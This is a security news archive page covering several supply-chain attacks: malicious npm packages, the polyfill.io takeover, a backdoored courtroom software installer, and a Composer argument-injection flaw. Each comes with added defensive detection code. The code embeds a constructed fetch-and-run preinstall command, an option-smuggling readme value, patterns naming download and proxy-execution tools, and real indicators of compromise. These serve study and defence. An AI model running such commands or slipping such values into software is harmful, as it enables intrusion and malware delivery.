supply chain attack Archives - Cyber Security News
https://cybersecuritynews.com/tag/supply-chain-attack/
Feed last updated: Tue, 06 Aug 2024 11:11:02 +0000

North Korean Hackers Attacking Windows Users With Weaponized npm Files
https://cybersecuritynews.com/north-korean-npm-attacks-windows/
Tue, 06 Aug 2024 11:10:58 +0000

The post North Korean Hackers Attacking Windows Users With Weaponized npm Files appeared first on Cyber Security News.

Scalable package scanning of PyPI and npm with Datadog's GuardDog tool identified two malicious packages linked to a DPRK-aligned threat actor cluster dubbed "Stressed Pungsan."

The cluster overlaps strongly with the group Microsoft tracks as MOONSTONE SLEET, which points to a deliberate software supply chain attack vector.

The packages serve as the initial access stage for malware delivery; once the payload runs, it can be used for data exfiltration, credential theft, and lateral movement inside the targeted environment.

Attack Flow

The npm user nagasiren978 uploaded two malicious packages, harthat-hash and harthat-api, on July 7, 2024. Both download additional malware from a suspected North Korean command-and-control (C2) server.

That server distributes batch scripts and a DLL, which points to Windows systems as the intended targets and is consistent with MOONSTONE SLEET, a North Korean threat actor identified by Microsoft.

Both packages rely on an npm preinstall script: it downloads the DLL from the remote server, executes it with rundll32, and then removes its own traces.


The two packages are nearly identical except for a unique identifier embedded in the download URL, which suggests a campaign aimed at several victims, possibly with a different payload for each.

The name harthat-api is a typosquat of the legitimate Hardhat package, relying on the visual similarity of the two names.

The package code itself is copied from the well-known node-config repository. The malicious copy ships a modified package.json; once the preinstall hook has run, the script swaps in a clean package.json that removes the preinstall entry and changes the package name back to config.

It also includes two additional files, deference.js and pk.json, whose purposes are not analysed in this excerpt.

The preinstall script downloads a DLL disguised as a temporary file from the remote server, renames it to package.db, and executes it through the rundll32 system utility.

This technique, System Binary Proxy Execution (MITRE ATT&CK T1218.011, Rundll32), loads the payload through a trusted, signed Windows binary so that the execution looks legitimate to naive controls; the script then deletes the downloaded DLL and restores a clean package.json to mask its activity.
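A quick way to catch this pattern before `npm install` runs anything is to inspect the lifecycle hooks in package.json. The auditor below is an added example written for this page, not GuardDog's code or the attackers' script; the two manifests embedded in it are constructed (the command in the first mirrors the steps described above, with an RFC 5737 documentation address in place of the real server), and the rule names are my own.

```python
"""Audit npm package.json lifecycle hooks for install-time payload delivery.

Added example for this page, not GuardDog's code and not the attackers'
script. Rule names are my own; the manifests at the bottom are constructed.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass

# Hooks npm runs automatically around `npm install` / `npm uninstall`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                   "preuninstall", "postuninstall")

# Each rule matches one step of the chain described in the article.
RULES = [
    ("remote_fetch", re.compile(
        r"\b(curl|wget|Invoke-WebRequest|iwr|bitsadmin|certutil\s+-urlcache)\b", re.I)),
    ("proxy_execution", re.compile(
        r"\b(rundll32|regsvr32|mshta|wscript|cscript)(\.exe)?\b", re.I)),
    ("encoded_powershell", re.compile(
        r"\bpowershell(\.exe)?\b.*\s-e(c|nc|ncodedcommand)?\s", re.I)),
    ("self_cleanup", re.compile(
        r"\b(del|rm|Remove-Item)\b[^&;|]*(\.db|\.tmp|\.dll)\b", re.I)),
    ("manifest_swap", re.compile(
        r"\b(move|mv|ren|copy|cp)\b[^&;|]*package\.json\b", re.I)),
]


@dataclass(frozen=True)
class Finding:
    hook: str
    rule: str
    command: str


def audit_manifest(manifest: dict) -> list[Finding]:
    """Return one Finding per (hook, rule) hit in the manifest's scripts."""
    scripts = manifest.get("scripts") or {}
    findings: list[Finding] = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not isinstance(command, str) or not command.strip():
            continue
        for rule_name, pattern in RULES:
            if pattern.search(command):
                findings.append(Finding(hook, rule_name, command))
    return findings


def verdict(findings: list[Finding]) -> str:
    """'block' when a hook both fetches remote content and proxies execution,
    'review' on any other hit, 'clean' otherwise."""
    rules = {f.rule for f in findings}
    if {"remote_fetch", "proxy_execution"} <= rules:
        return "block"
    return "review" if rules else "clean"


def audit_json(text: str) -> tuple[str, list[Finding]]:
    """Parse a package.json document and return (verdict, findings)."""
    findings = audit_manifest(json.loads(text))
    return verdict(findings), findings


# Constructed sample mirroring the behaviour described in the article. The
# host 198.51.100.7 is a documentation address, not the real C2 server.
SUSPICIOUS_MANIFEST = json.dumps({
    "name": "harthat-api",
    "version": "1.3.1",
    "scripts": {
        "preinstall": ("curl -s -o package.db http://198.51.100.7/Temp.b"
                       " && rundll32 package.db,GenerateKeyW"
                       " && del package.db && move /y pk.json package.json"),
    },
})

# Constructed benign sample: a native addon that rebuilds on install.
BENIGN_MANIFEST = json.dumps({
    "name": "some-native-addon",
    "version": "2.0.0",
    "scripts": {"install": "node-gyp rebuild", "prepare": "husky install"},
})

if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS_MANIFEST), ("benign", BENIGN_MANIFEST)):
        result, hits = audit_json(text)
        print(f"{label}: {result}")
        for hit in hits:
            print(f"  {hit.hook}: {hit.rule}")
```

Run it over `node_modules/*/package.json` after an install done with `npm install --ignore-scripts`, which also stops the hook from executing in the first place; `npm config set ignore-scripts true` makes that the default. The rules are deliberately narrow and will miss a hook such as `node deference.js`, where the logic lives in a file rather than in the manifest, so treat a clean result as necessary, not sufficient.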

Figure: list of exported functions from IDA Pro

The Datadog Security Research team's analysis of the malicious DLL found a seemingly benign binary with no apparent malicious functionality. It exports two functions; one of them, GenerateKeyW, is where malicious code would be expected.

Neither static nor dynamic analysis uncovered any self-modification or harmful behaviour in the DLL.

The absence of malicious code suggests the DLL is an incomplete or test build: the threat actor is either still experimenting with the infrastructure or made an operational error.

Figure: disassembly showing the contents of GenerateKeyW

The packages were delivered as harthat-api v1.3.1 (harthat-api-v1.3.1.zip) and harthat-hash v1.3.3 (harthat-hash-v1.3.3.zip), padded with copied content to look legitimate.

The payload was downloaded from the IP address 142.111.77.196. Indicators of compromise (IOCs):

  • C2 server: 142.111.77.196
  • Downloaded file: Temp.b (renamed to package.db on disk)
  • SHA256 of Temp.b: d2a74db6b9c900ad29a81432af72eee8ed4e22bf61055e7e8f7a5f1a33778277
  • npm packages: harthat-hash 1.3.3 and harthat-api 1.3.1, published by nagasiren978


Polyfill JS Library Injected Malware Into 100K+ Websites
https://cybersecuritynews.com/polyfill-js-library-malware-attack/
Wed, 26 Jun 2024 13:27:47 +0000

The post Polyfill JS Library Injected Malware Into 100K+ Websites appeared first on Cyber Security News.

Polyfill.js is a JavaScript library that provides modern functionality on older browsers lacking native support for certain web features.

Polyfills ensure compatibility across a wide range of browsers by implementing what is missing, letting developers use modern JavaScript and web APIs.

In February, a Chinese firm purchased the cdn.polyfill.io domain and the GitHub account behind the popular polyfill.js library, which is used by more than 100K sites, including JSTOR, Intuit and the World Economic Forum.

Since then, researchers at Sansec found that complaints about the domain injecting malware aimed at mobile devices had been posted to the project's GitHub and quickly deleted.


Polyfill JS Library Injected

Sansec decoded one variant that redirects mobile users to a gambling website through a lookalike Google Analytics domain; the code carries anti-reverse-engineering protections and activates only selectively.

The library's original author now advises against using polyfill.io at all, while Fastly and Cloudflare host safe alternatives.

This incident is a textbook supply chain attack and underscores the importance of monitoring third-party code that is loaded into users' browsers.

During their investigation the researchers assigned descriptive names to various code components to make them easier to follow.

They noted, however, that one function name, "tiaozhuan", was not theirs but an original element of the malware.

The Chinese term (跳转, "jump" or "redirect" in English) was left in by the threat actors, a small clue about the malware's origin or its authors' background.

IoCs

  • https://kuurza[.]com/redirect?from=bitget
  • https://www.googie-anaiytics[.]com/html/checkcachehw.js
  • https://www.googie-anaiytics[.]com/ga.js
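The practical check sits on the consuming site: which third-party hosts does a page load scripts from, and can their content be pinned? The scanner below is an added example written for this page, not Sansec's tooling. The HTML it parses is constructed, the host names other than polyfill.io are `.test` placeholders, the integrity value is a dummy, and the verdict labels are mine.

```python
"""Inventory third-party <script src> tags and flag the polyfill.io case.

Added example for this page (not Sansec's code). The HTML sample is
constructed; hosts other than polyfill.io are placeholders.
"""
from __future__ import annotations

from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the article describes as taken over; anything under them must go.
REMOVE_HOSTS = ("polyfill.io",)


@dataclass(frozen=True)
class ScriptFinding:
    src: str
    host: str
    has_sri: bool
    verdict: str  # "remove" | "add-sri" | "ok"


class _ScriptCollector(HTMLParser):
    """Collect the attribute map of every <script> that has a src."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: list[dict[str, str | None]] = []

    def handle_starttag(self, tag: str, attrs: list[tuple[str, str | None]]) -> None:
        if tag.lower() == "script":
            attr_map = dict(attrs)
            if attr_map.get("src"):
                self.scripts.append(attr_map)


def _host_of(src: str) -> str:
    # urlparse handles absolute and protocol-relative (//host/path) URLs;
    # a bare path has no netloc and is treated as same-origin.
    return urlparse(src.strip()).netloc.lower()


def _is_removed_host(host: str) -> bool:
    return any(host == h or host.endswith("." + h) for h in REMOVE_HOSTS)


def audit_html(html: str, own_host: str) -> list[ScriptFinding]:
    """Return one finding per script loaded from a host other than own_host."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings: list[ScriptFinding] = []
    for attrs in collector.scripts:
        src = attrs["src"] or ""
        host = _host_of(src)
        if not host or host == own_host.lower():
            continue
        has_sri = bool(attrs.get("integrity"))
        if _is_removed_host(host):
            verdict = "remove"
        elif not has_sri:
            verdict = "add-sri"
        else:
            verdict = "ok"
        findings.append(ScriptFinding(src, host, has_sri, verdict))
    return findings


# Constructed page: one polyfill.io include, one pinned CDN script, one
# unpinned protocol-relative script, and one same-origin script.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<script src="https://cdn.polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script src="https://cdn.example-cdn.test/lib/vendor.min.js"
        integrity="sha384-ConstructedPlaceholderNotARealDigest" crossorigin="anonymous"></script>
<script src="//static.example-cdn.test/widget.js"></script>
<script src="/js/app.js"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_PAGE, "www.example.test"):
        print(f"{finding.verdict:8} {finding.host:28} sri={finding.has_sri}  {finding.src}")
```

Two caveats. Subresource Integrity would not have saved a polyfill.io user: the service assembled a different bundle per User-Agent, so there was never one hash to pin, which is why removal (or a self-hosted, known-good copy) is the only sound fix. And a markup scan only sees what is in the HTML; scripts injected at runtime by other scripts need a browser-side inventory, for instance a Content-Security-Policy whose `script-src` lists only the hosts you actually trust, deployed in report-only mode first.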


Hackers Backdoored Courtroom Video Recording Software With System Hijacking Malware
https://cybersecuritynews.com/courtroom-software-hijack/
Fri, 24 May 2024 12:03:32 +0000

The post Hackers Backdoored Courtroom Video Recording Software With System Hijacking Malware appeared first on Cyber Security News.

A vulnerability tracked as CVE-2024-4978 has been identified in JAVS Viewer v8.3.7, a component used to manage digital recordings in courtroom, legal and government environments.

The installer for this version was backdoored, allowing attackers to remotely seize control of infected systems, which could give them access to sensitive data and a foothold from which to persist on the network.

To mitigate the risk, users should immediately re-image affected devices and reset all associated credentials.

Once a clean system image is in place, upgrade to JAVS Viewer v8.3.8 or later.

An investigation into the execution of a malicious fffmpeg.exe binary from the C:\Program Files (x86)\JAVS\Viewer 8\ folder revealed a supply chain attack.

The culprit was traced to a compromised JAVS Viewer installer (JAVS.Viewer8.Setup_8.3.7.250-1.exe) downloaded from the official JAVS website on March 5.


The installer was signed with an unexpected certificate and contained the malicious fffmpeg.exe, which executed encoded PowerShell scripts and dropped a variant of the GateDoor/RustDoor malware family.

Figure: sample network traffic containing information about the host

fffmpeg.exe is plainly malicious: it connects to a command-and-control server using Windows sockets and WinHTTP requests and transmits host data such as the hostname, OS details and username.

After establishing a persistent connection, it waits for commands from the C2 server.

Further investigation revealed the execution of obfuscated PowerShell scripts, pointing to additional malicious actions.

Rapid7 analyzed two malicious executables, fffmpeg.exe and chrome_installer.exe. fffmpeg.exe runs obfuscated PowerShell scripts that attempt to disable security controls and download additional malware.

chrome_installer.exe creates temporary files and attempts to run a Python program compiled into an executable (main.exe) to steal browser credentials.

However, the analysis suggests a bug in the source code may prevent main.exe from working properly.

Figure: temp folder creation using the string {TEMP}\onefile_{PID}_{TIME} (the default extraction-directory pattern of a Nuitka onefile build)

The malicious JAVS.Viewer8.Setup_8.3.7.250-1.exe installer contained the suspicious fffmpeg.exe binary, whose name carries a typographical tell ("fff" instead of the legitimate "ff"), and the installer itself was signed with an unexpected certificate issued to "Vanguard Tech Limited" rather than the legitimate "Justice AV Solutions Inc.".

A search on VirusTotal turned up another malicious installer variant and dropper, with different hashes, dating back to April 1, 2024.

Interestingly, a debug file (Dll2.dll) shipped in the first installer variant contained an uncleaned compilation path, a likely oversight by the attackers.

Figure: VirusTotal results for the Vanguard Tech Limited certificate

Attackers compromised the official download page of JAVS, a legitimate software vendor, and replaced the legitimate JAVS Viewer installer with a malicious one signed with a fraudulent certificate.

The malware dropper was disguised as a software update for popular applications (Chrome, Firefox and OneDrive).

The campaign ran for several months, from February to May 2024, and the malicious installer was eventually removed by the attackers themselves.
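Three of the findings above translate directly into endpoint detection logic: an executable whose name is one character off a well-known tool, a binary under the vendor's install path signed by someone other than the vendor, and PowerShell spawned with an encoded command. The detector below is an added example written for this page, not Rapid7's code. The event records are constructed, their field names are an assumed schema rather than any EDR vendor's, the parent process path is made up, and the base64 blob is a harmless placeholder.

```python
"""Flag a JAVS-style tampered binary from process-creation telemetry.

Added example for this page, not Rapid7's analysis code. Events and their
field names are constructed; the base64 is a harmless placeholder.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the started executable
    signer: str         # subject on its Authenticode signature ("" if unsigned)
    parent_image: str   # full path of the parent process
    command_line: str


# Install path -> publisher expected to sign everything under it (lower-case).
EXPECTED_SIGNERS = {
    r"c:\program files (x86)\javs\viewer 8": "justice av solutions inc.",
}

# Legitimate tool names an attacker might imitate with a near-miss.
KNOWN_TOOLS = ("ffmpeg.exe", "ffprobe.exe", "ffplay.exe")

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_PS = re.compile(r"\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot one-character imitations."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _split(path: str) -> tuple[str, str]:
    """Return (folder, file name), both lower-cased, for a Windows path."""
    folder, _, name = path.lower().rpartition("\\")
    return folder, name


def lookalike_of(name: str) -> str | None:
    for tool in KNOWN_TOOLS:
        if name != tool and edit_distance(name, tool) == 1:
            return tool
    return None


def analyse(events: list[ProcessEvent]) -> list[tuple[str, str, str]]:
    """Return (rule, image name, detail) triples, in event order."""
    alerts: list[tuple[str, str, str]] = []
    for ev in events:
        folder, name = _split(ev.image)
        for prefix, publisher in EXPECTED_SIGNERS.items():
            if folder.startswith(prefix) and ev.signer.lower() != publisher:
                alerts.append(("unexpected_signer", name, ev.signer or "<unsigned>"))
        tool = lookalike_of(name)
        if tool:
            alerts.append(("lookalike_name", name, f"one edit from {tool}"))
        if name in ("powershell.exe", "pwsh.exe") and ENCODED_PS.search(ev.command_line):
            _, parent = _split(ev.parent_image)
            alerts.append(("encoded_powershell", name, f"parent {parent}"))
    return alerts


# Constructed events modelled on the behaviour described in the article.
SAMPLE_EVENTS = [
    ProcessEvent(
        image=r"C:\Program Files (x86)\JAVS\Viewer 8\fffmpeg.exe",
        signer="Vanguard Tech Limited",
        parent_image=r"C:\Program Files (x86)\JAVS\Viewer 8\JAVS Viewer.exe",
        command_line="fffmpeg.exe",
    ),
    ProcessEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        signer="Microsoft Windows",
        parent_image=r"C:\Program Files (x86)\JAVS\Viewer 8\fffmpeg.exe",
        # Placeholder base64 (decodes to the start of a harmless string).
        command_line="powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    ),
    ProcessEvent(  # a real ffmpeg outside the vendor folder: no alert
        image=r"C:\Tools\ffmpeg\bin\ffmpeg.exe",
        signer="",
        parent_image=r"C:\Windows\explorer.exe",
        command_line="ffmpeg.exe -i in.mp4 out.mkv",
    ),
]

if __name__ == "__main__":
    for rule, image, detail in analyse(SAMPLE_EVENTS):
        print(f"{rule:20} {image:16} {detail}")
```

The signer check is the one that survives renaming: a validly signed binary under a vendor's path whose certificate subject is not the vendor is either a packaging mistake or a compromise, and `Get-AuthenticodeSignature` on the downloaded installer would have shown the Vanguard Tech Limited subject before it ever ran. The encoded-command pattern will also fire on benign management tooling, so scope it to parent processes outside your usual administrative set.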


PHP Supply Chain Attack – Critical Vulnerability in PHP Central Component
https://cybersecuritynews.com/php-supply-chain-attack/
Thu, 06 Oct 2022 12:45:18 +0000

The post PHP Supply Chain Attack – Critical Vulnerability in PHP Central Component appeared first on Cyber Security News.

Packagist was affected by a serious vulnerability, reported by the code security company SonarSource.

Had it been exploited, the flaw could have enabled a supply chain attack against the PHP community.

Composer, the PHP dependency manager, uses Packagist as its default repository; Packagist aggregates all public PHP packages that can be installed with Composer.

Over 2 billion packages are downloaded through Composer every month.

Malicious dependencies could have been distributed through the newly discovered vulnerability, which could have led to the compromise of millions of servers had it been abused effectively.

Critical Vulnerability

The vulnerability is tracked as CVE-2022-24828 and is a command injection flaw: an attacker can control input that Composer passes on as parameters to the version control tools it invokes.

CVE-2022-24828 is related to CVE-2021-29472, an earlier command injection vulnerability reported in Composer.

An attacker controlling a Git or Mercurial repository could have used this vulnerability against Packagist.org and Private Packagist.

Demonstration of CVE-2022-24828

Anyone who controls a Git or Mercurial repository can exploit Composer through values it reads from that repository, such as branch names and the readme path declared in the project's composer.json, because those values were passed as arguments to the git and hg commands Composer runs.

The steps to reproduce the issue:

  1. Create a Mercurial repository and, inside it, a project for the exploit.
  2. Add a composer.json manifest to the project with a malicious readme entry.
  3. Create the .sh payload that performs the desired action.
  4. Submit the project to Packagist as a package, which triggers the vulnerable code path.
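The procedure works because values Composer read from the repository ended up as arguments to `hg` and `git`; escaping them for the shell is not enough, since an argument that starts with `-` is still parsed as an option by the tool itself. The snippet below is an added example in Python, not Composer's PHP code. It builds the `hg cat` argument vector the same way, first unchecked and then with two controls that close the hole (an allow-list on the values and the `--` end-of-options marker); the exact check in Composer's patch is not reproduced here. The composer.json and its `--config=` readme value are constructed, and the alias it defines merely echoes a string.

```python
"""Argument injection of the CVE-2022-24828 kind, shown in Python.

Added example for this page, not Composer's PHP code. The manifest and
the option-looking readme value below are constructed.
"""
from __future__ import annotations

import json
import re
import shlex

# Assumed allow-list, not Composer's actual check: values may not start
# with '-' and may not contain whitespace or shell metacharacters.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.@/+-]*$")


def hg_cat_argv_unchecked(identifier: str, file: str) -> list[str]:
    """The vulnerable shape: repository-controlled values go straight into
    the argument vector. shlex.quote would protect a shell, but hg itself
    still sees any '-...' token as an option."""
    return ["hg", "cat", "-r", identifier, file]


def hg_cat_argv_hardened(identifier: str, file: str) -> list[str]:
    for value in (identifier, file):
        if not SAFE_VALUE.match(value):
            raise ValueError(f"refusing option-looking or malformed value: {value!r}")
    # '--' tells hg that everything after it is positional, even if it
    # starts with '-'; the allow-list is the primary control, '--' the backstop.
    return ["hg", "cat", "-r", identifier, "--", file]


def options_parsed_by_hg(argv: list[str]) -> list[str]:
    """Model of how hg tokenises argv after the subcommand: every '-...'
    token before a standalone '--' is an option; nothing after '--' is."""
    opts: list[str] = []
    for token in argv[2:]:
        if token == "--":
            break
        if token.startswith("-"):
            opts.append(token)
    return opts


def shell_line(argv: list[str]) -> str:
    """The same call rendered for a shell: quoting is correct, and changes
    nothing about the option problem."""
    return " ".join(shlex.quote(t) for t in argv)


# Constructed attacker-controlled composer.json. Composer read 'readme' and
# passed it to hg as the file to show. The value is shaped so that hg
# would treat it as a --config option; the alias it defines only echoes.
ATTACKER_COMPOSER_JSON = json.dumps({
    "name": "attacker/package",
    "readme": "--config=alias.cat=!echo injected",
})


def readme_from_manifest(text: str) -> str:
    return json.loads(text)["readme"]


if __name__ == "__main__":
    readme = readme_from_manifest(ATTACKER_COMPOSER_JSON)
    unchecked = hg_cat_argv_unchecked("default", readme)
    print("unchecked:", shell_line(unchecked))
    print("options hg would parse:", options_parsed_by_hg(unchecked))
    try:
        hg_cat_argv_hardened("default", readme)
    except ValueError as exc:
        print("hardened:", exc)
    print("hardened (benign):", shell_line(hg_cat_argv_hardened("release/1.2", "README.md")))
```

The same reasoning applies to git, which also reads `--`-prefixed options from anywhere in its argument list; the general rule for any wrapper around a CLI is to validate each value against the shape it is supposed to have and to place all untrusted values after `--`.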

Security Patch

If you embed Composer as a library and work with untrusted repositories, upgrade to one of the following versions:

  • 1.10.26
  • 2.2.12
  • 2.3.5

The Packagist maintainers were notified on April 7 and published a patch the next day. No exploitation in the wild has been reported.


What is a Supply Chain Attack? How Attackers Use that to Compromise Organization Security
https://cybersecuritynews.com/supply-chain-attack/
Thu, 29 Jul 2021 08:18:54 +0000

The post What is a Supply Chain Attack? How Attackers Use that to Compromise Organization Security appeared first on Cyber Security News.

How does a supply chain attack work? It is a cyber-attack that targets an organization through the weakest link in its supply chain: the network of organizations, technologies, people and other resources involved in creating and selling a product.

That chain covers everything from sourcing material from the manufacturer to delivery to the end user. Attacks succeed by hitting the weak point, and attackers mainly abuse the trust an organization places in its third-party vendors.

Organizations tightly connected to third-party vendors are the quickest to be hit. Supply chain attacks are rising in relevance and increasingly succeed against their targets. Every supply chain has a few weak links that are easy for cybercriminals to target, and organizations must be aware of them and put security controls in place.

Supply chain attacks let an adversary hit a specific target while the number of victims grows quickly, because the attack rides on trusted, widely distributed software and is therefore hard to detect. The more third-party vendors an organization depends on, the more risk it takes on, and that risk is passed along from one team to the next.

Supply Chain Attack Risks:

We are increasingly dependent on digitalization, and cybersecurity risk grows with it. Many organizations try to keep valuable data safe inside their own walls, yet the following risks keep coming up:

  1. Financial risk: a data leak has financial consequences across the whole network, and the economic fallout of a breach can be substantial.
  2. Reputational risk: a supplier breach damages the reputation of every party involved, and such incidents become widely known in the market; the organization affected by the breach carries that reputational damage.
  3. Operational risk: operations are disrupted by a breach, and the attacker may hold access to the network for an undetermined period. Supply chain risk involves many vendors, each of which can affect the client organization.
  4. Societal risk: digital systems depend on trust. A breach along the digital journey erodes the trust that people and organizations place in the systems they rely on, and that trust is essential for operation and continued growth.

When securing your supply chain, what do you need to consider?

Whenever you extend access to your supply chain, your security practices must extend with it. Identify what is most valuable to you early, build security in from the start, monitor continuously, and verify that the controls are effective.

  1. Hold your suppliers to a high security standard. Many organizations neglect this; those that do not require their suppliers to adopt and follow strict protocols.
  2. Create a culture of protection: when it comes to protecting data from cyber threats, suppliers on the outskirts of your organization are the first line of defense, since they are the first to be given access. Suppliers need to know how to manage that access properly, and you need to be able to detect any problem early. Whenever you set up a new data connection, take steps to protect the crown jewels: test the product, service and configuration, keep up with the latest technology, and focus on the security protocol. Do not assume a supplier will fit into your security architecture without testing.

Technology evolves and needs regular updates to remain effective. Your supplier relationships, your adoption of technology and your knowledge of who has access all feed into a better risk assessment.

Supply Chain Attack Mitigation

Protecting the supply chain means rethinking your security approach. There is no silver bullet for safeguarding your organization; security has to be an integrated part of business practice. Consider the following when securing the supply chain:

  1. Supplier management: security requirements belong in contracts, assessments, monitoring and execution. Audit suppliers to make sure they continue to adhere to them, and build a culture in which suppliers proactively inform you of problems, all the more so if they suffer a breach.
  2. Asset management: keep a clear overview of your organization's assets and status; suppliers must know what is happening and what role they play for the organization.
  3. People awareness: supply chain management depends on suppliers and contractors. Apply to individuals the same strict security standards you apply to suppliers. Even for a familiar person, grant access only with proper clearance, and revoke credentials when the contract ends.
  4. Monitoring and cyber threat intelligence: monitoring lets you detect when things go wrong and feeds tracked intelligence back in. For key suppliers, monitor risk based on the elements agreed during the contracting phase. Cyber threat intelligence gives a clear view of a critical supplier's risk exposure and helps manage that risk.
  5. Penetration testing: when new technology is introduced, think about its security and have the design tested. Several third parties offer this as a service. An organization that holds highly sensitive data has a responsibility here and must acknowledge it.

Final Thoughts

Challenge your suppliers and align your security with their digital journey. The business environment is changing: many companies have gained new opportunities, but the risk has grown with them, so your organization's security function must keep up.

Recent Supply Chain Attacks

Supply-chain Attack – Codecov Breach Hundreds of Networks Reportedly Hacked

Researchers Hacked into Microsoft, Apple, more in Novel Supply Chain Attack

Kaseya’s IT Management Software Supply-Chain Attack Hits 40 Customers Worldwide With REvil Ransomware
